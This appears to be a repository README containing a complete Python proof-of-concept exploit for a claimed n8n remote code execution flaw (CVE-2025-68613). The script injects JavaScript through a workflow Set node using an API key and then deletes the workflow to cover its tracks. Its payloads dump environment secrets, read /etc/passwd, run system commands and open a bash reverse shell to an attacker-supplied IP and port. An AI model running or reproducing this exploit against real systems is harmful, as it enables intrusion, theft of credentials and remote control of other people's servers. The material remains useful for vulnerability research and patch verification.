README.md
Rendering markdown...
import requests
import json
import argparse
import sys
def exploit_n8n(base_url, api_key, payload_type, attacker_ip=None, attacker_port=None):
# Remove trailing slash if present
if base_url.endswith('/'):
base_url = base_url[:-1]
headers = {
'Content-Type': 'application/json',
'X-N8N-API-KEY': api_key
}
# Available payloads
payloads = {
'env_leak': "{{ (function() { return process.env; })() }}",
'whoami': "{{ require('child_process').execSync('whoami').toString() }}",
'id': "{{ require('child_process').execSync('id').toString() }}",
'read_file': "{{ require('fs').readFileSync('/etc/passwd', 'utf8') }}",
'reverse_shell': f"{{{{ require('child_process').exec('bash -c \"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1\"') }}}}"
}
if payload_type not in payloads:
print(f"[!] Invalid payload type. Available: {', '.join(payloads.keys())}")
sys.exit(1)
selected_payload = payloads[payload_type]
if payload_type == 'reverse_shell' and (not attacker_ip or not attacker_port):
print("[!] reverse_shell requires --attacker_ip and --attacker_port")
sys.exit(1)
# Minimal workflow with Set node containing the malicious expression
workflow = {
"name": "CVE-2025-68613 PoC",
"nodes": [
{
"parameters": {},
"name": "Start",
"type": "n8n-nodes-base.manualTrigger",
"typeVersion": 1,
"position": [240, 300]
},
{
"parameters": {
"values": {
"string": [
{
"name": "output",
"value": selected_payload
}
]
},
"options": {}
},
"name": "Exploit",
"type": "n8n-nodes-base.set",
"typeVersion": 3,
"position": [460, 300]
}
],
"connections": {
"Start": {
"main": [
[
{
"node": "Exploit",
"type": "main",
"index": 0
}
]
]
}
},
"active": False,
"settings": {},
"tags": []
}
# Create workflow
print("[+] Creating malicious workflow...")
create_resp = requests.post(f"{base_url}/rest/workflows", headers=headers, json=workflow)
if create_resp.status_code not in (200, 201):
print(f"[-] Failed to create workflow: {create_resp.status_code} {create_resp.text}")
sys.exit(1)
workflow_id = create_resp.json()['id']
print(f"[+] Workflow created with ID: {workflow_id}")
# Execute workflow
print("[+] Executing workflow...")
exec_resp = requests.post(f"{base_url}/rest/workflows/{workflow_id}/run", headers=headers)
if exec_resp.status_code != 200:
print(f"[-] Failed to execute workflow: {exec_resp.status_code} {exec_resp.text}")
else:
result = exec_resp.json()
print("[+] Execution result:")
if 'data' in result and 'result' in result['data']:
output = result['data']['result']['data']['main'][0][0]['json']
print(json.dumps(output, indent=2))
else:
print(json.dumps(result, indent=2))
# Cleanup
print("[+] Cleaning up (deleting workflow)...")
delete_resp = requests.delete(f"{base_url}/rest/workflows/{workflow_id}", headers=headers)
if delete_resp.status_code == 200:
print("[+] Workflow deleted successfully")
else:
print(f"[-] Failed to delete workflow: {delete_resp.text}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="CVE-2025-68613 n8n RCE Exploit PoC")
parser.add_argument("--url", required=True, help="Base URL of n8n instance (e.g. https://n8n.example.com)")
parser.add_argument("--api_key", required=True, help="n8n API key (X-N8N-API-KEY)")
parser.add_argument("--payload", required=True,
choices=['env_leak', 'whoami', 'id', 'read_file', 'reverse_shell'],
help="Payload type to execute")
parser.add_argument("--attacker_ip", help="Your IP for reverse shell")
parser.add_argument("--attacker_port", help="Your listening port for reverse shell")
args = parser.parse_args()
exploit_n8n(args.url, args.api_key, args.payload, args.attacker_ip, args.attacker_port)